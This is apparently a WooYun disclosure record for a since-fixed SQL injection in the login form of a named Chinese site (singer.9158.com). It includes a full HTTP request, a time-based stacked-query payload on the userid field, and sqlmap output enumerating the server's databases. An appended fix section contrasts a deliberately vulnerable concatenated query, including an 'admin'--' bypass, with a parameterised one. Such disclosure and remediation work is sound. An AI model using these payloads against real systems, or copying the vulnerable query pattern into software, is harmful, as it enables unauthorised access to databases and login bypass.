
Vulnerability summary

Defect ID: wooyun-2015-0119835

Title: SQL injection in a 9158 site

Vendor: 天格科技(杭州) (TianGe Technology, Hangzhou)

Author: 天地不仁 以万物为刍狗

Submitted: 2015-06-11 17:51

Fixed: 2015-07-22 20:42

Disclosed: 2015-07-22 20:42

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: fixed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-11: Details reported to the vendor, awaiting vendor action
2015-06-11: Vendor confirmed; details visible to the vendor only
2015-06-21: Details opened to core white hats and domain experts
2015-07-01: Details opened to regular white hats
2015-07-11: Details opened to intern white hats
2015-07-22: Vendor fixed the vulnerability and chose to disclose; details opened to the public

Summary:

Heaven and earth are not benevolent; they treat all things as straw dogs.

Details:

POST request:

POST /login.aspx HTTP/1.1
Host: singer.9158.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://singer.9158.com/
Cookie: ASP.NET_SessionId=3chgwu45soqh11fxloigko45
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 281
__VIEWSTATE=%2FwEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ


The userid parameter is not filtered. 13 databases were enumerated (see the screenshots below and the proof section for the exact parameters).

[Screenshot: 1.png]

[Screenshot: 2.png]

Proof:

POST parameter 'userid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 1041 HTTP(s) requests:
---
Parameter: userid (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUKLTU5OTI5MDA4MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDEltYWdlQnV0dG9uMSnrtngDOPw6MUqDuuzz8nqygUpv&userid=admin';WAITFOR DELAY '0:0:20'--&pwd=admin&yazhengma=hgop&ImageButton1.x=50&ImageButton1.y=11&__EVENTVALIDATION=/wEWAwL2hPTXDQLr94HeAgLSwpnTCCyMTjibN10ybcZ4dhPkX08qBWoJ
---
[14:30:58] [INFO] testing Microsoft SQL Server
[14:30:58] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[14:31:18] [INFO] confirming Microsoft SQL Server
[14:32:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:32:20] [INFO] fetching database names
[14:32:20] [INFO] fetching number of databases
[14:32:20] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[14:32:20] [INFO] retrieved:
[14:32:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:32:21] [ERROR] unable to retrieve the number of databases
[14:32:21] [INFO] retrieved: TianGe
[14:39:22] [INFO] retrieved: master
[14:47:02] [INFO] retrieved: tempdb
[14:55:41] [INFO] retrieved: model
[15:03:27] [INFO] retrieved: msdb
[15:08:41] [INFO] retrieved:
[15:09:44] [ERROR] invalid character detected. retrying..
Repor
[15:19:30] [ERROR] invalid character detected. retrying..
[15:20:32] [ERROR] invalid character detected. retrying..
tServer
[15:30:30] [INFO] retrieved: ReportServerTempDB
[15:55:11] [INFO] retrieved: SEND_MAIL
[16:04:44] [INFO] retrieved: TianGe
[16:11:44] [INFO] retrieved: IP_Stat
[16:21:07] [INFO] retrieved: TianGe_History
[16:40:12] [INFO] retrieved: CarNew
[16:47:12] [INFO] retrieved: CarSport
[16:58:03] [INFO] retrieved: DBA_Monitor
[17:12:36] [INFO] retrieved:
available databases [13]:
[*] CarNew
[*] CarSport
[*] DBA_Monitor
[*] IP_Stat
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] SEND_MAIL
[*] tempdb
[*] TianGe
[*] TianGe_History

Fix recommendation:

Copyright: when reposting, please credit 天地不仁 以万物为刍狗@乌云
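The report leaves this section empty. The example below is added here and is neither the reporter's nor the vendor's code: it contrasts the string-concatenation pattern implied by the unfiltered userid parameter in the login handler with a parameterised query. It assumes a minimal users table and uses an in-memory SQLite database as a constructed stand-in for the site's SQL Server login store (the "admin'--" case shows the structural flaw without a delay payload).

```python
import sqlite3


def make_db():
    # Constructed sample data: a one-row login table standing in for the
    # real store (the report's target ran Microsoft SQL Server, but the
    # concatenation defect behaves the same way here).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid TEXT, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def build_vulnerable_sql(userid, pwd):
    # The pattern the finding implies: the raw userid value is spliced into
    # the SQL text, so a quote closes the literal and ';' or '--' change the
    # statement itself (stacked queries on SQL Server, as sqlmap reported).
    return ("SELECT COUNT(*) FROM users WHERE userid = '" + userid
            + "' AND pwd = '" + pwd + "'")


def vulnerable_login(conn, userid, pwd):
    return conn.execute(build_vulnerable_sql(userid, pwd)).fetchone()[0] > 0


def safe_login(conn, userid, pwd):
    # Parameterised query: the values travel separately from the SQL text,
    # so the same characters are matched literally and the password clause
    # cannot be commented away.
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE userid = ? AND pwd = ?",
        (userid, pwd),
    ).fetchone()
    return row[0] > 0


if __name__ == "__main__":
    conn = make_db()
    # "admin'--" turns the password check into a comment in the concatenated form.
    print(vulnerable_login(conn, "admin'--", "wrong"))  # True
    print(safe_login(conn, "admin'--", "wrong"))        # False
```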


Vendor response

Vendor reply:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-06-11 23:07

Vendor comment:

Thanks for submitting the vulnerability.

Latest status:

2015-07-22: Fixed.

2015-07-22: Fix confirmed.